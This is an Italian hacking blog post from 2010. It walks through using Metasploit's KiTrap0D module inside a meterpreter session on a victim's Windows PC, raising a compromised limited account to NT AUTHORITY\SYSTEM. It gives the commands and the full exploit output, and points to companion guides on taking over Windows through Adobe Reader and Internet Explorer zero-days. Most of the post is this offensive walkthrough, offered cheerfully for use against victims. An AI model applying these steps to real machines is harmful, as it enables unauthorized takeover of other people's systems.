KiTrap0D Virtual-DOS oday per metasploit :)

Posted on: 1 February 2010

Avevo già parlato di questo exploit qui:
[Virtual DOS]Exploit privilege escalation windows 2000/XP/VISTA/7/SERVER
Che non fa altro che darci i privilegi system kernel da un account limitato o amministratore.

In questi giorni, ho anche parlato di altri 2 exploit:

[guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit

e
[guida]Hack di WINDOWS con metasploit e IE 0day aka (Aurora) exploit

Questi exploit ci permettono di eseguire codice remoto sul pc della vittima e ottenere i privilegi dell’utente che sta utilizzando il programma vulnerabile (es abode reader 9.)

A questo punto, se da metasploit nella console meterpreter digitiamo:
getuid
avremo un output simile a questo:
meterpreter > getuid Server username: WINXPSP3\user
come vedrete dall’output, vuol dire che abbiamo i privilegi dell’utente user, che potrebbe essere limitato :(
Perciò ora entra in gioco KiTrap0D che ci darà i privilegi kernel.

Digitiamo quindi dalla console meterpreter:
run kitrap0d
e avremo questo output:
meterpreter > run kitrap0d [*] Currently running as WINXPSP3\user


[*] Loading the vdmallowed executable and DLL from the local system...

[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...

[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...

[*] Escalating our process (PID:1128)...

--------------------------------------------------

Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit

[?] GetVersionEx() => 5.1

[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000

[?] Searching for kernel 5.1 signature: version 2...

[+] Trying signature with index 3

[+] Signature found 0x29142 bytes from kernel base

[+] Starting the NTVDM subsystem by launching MS-DOS executable

[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316

[?] OpenProcess(1316) => 0x7e8

[?] Injecting the exploit thread into NTVDM subsystem @0x7e8

[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);

[?] WaitForSingleObject(0x7cc, INFINITE);

[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074

[+] The exploit thread reports exploitation was successful

[+] w00t! You can now use the shell opened earlier

[*] Deleting files... [*] Now running as NT AUTHORITY\SYSTEM
Digitiamo ora di nuovo:
getuid
ed ecco il risultato:

meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Ciao buon divertimento :)

This entry was posted on Monday, February 1st, 2010 at 5:13 pm and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.